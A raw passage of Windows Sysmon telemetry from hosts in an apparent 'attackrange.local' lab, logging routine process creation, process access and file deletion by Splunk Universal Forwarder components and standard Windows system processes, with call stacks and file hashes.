Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246429Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-5297-6063-CA22-00000000AF01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246428Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.257{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C00688D457B91DBB29A075A1D00C372,SHA256=AA44F96D7808F5D6E778E5E0D5C2FB86A6FDA4BD142B693110458E302F1DFBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246427Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.007{CB4067E1-5296-6063-C922-00000000AF01}3244396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061582Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB02182898C1E717F212E44EAA315263,SHA256=9DA2A42D8D7C9654E5082A666A749D6632528430A55F8806B891B44B22D05AF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061581Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5298-6063-3701-00000000AF01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061580Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061579Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061578Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061577Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061576Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5298-6063-3701-00000000AF01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061575Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.365{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5298-6063-3701-00000000AF01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061574Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:24.367{7F8C56E7-5298-6063-3701-00000000AF01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000246471Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5298-6063-CC22-00000000AF01}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246470Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246469Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246468Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246467Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246466Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246465Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246464Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246463Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246462Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246461Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-5298-6063-CC22-00000000AF01}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246460Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5298-6063-CC22-00000000AF01}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246459Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.914{CB4067E1-5298-6063-CC22-00000000AF01}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246458Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.539{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163F01A4CC7F5EA95FB785AECF9B7798,SHA256=260E9F37B3E04469112C6E39D925F8B994EB0B6420D742ADDB7F24992C7EA20D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246457Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.351{CB4067E1-5298-6063-CB22-00000000AF01}35361344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246456Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5298-6063-CB22-00000000AF01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246455Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 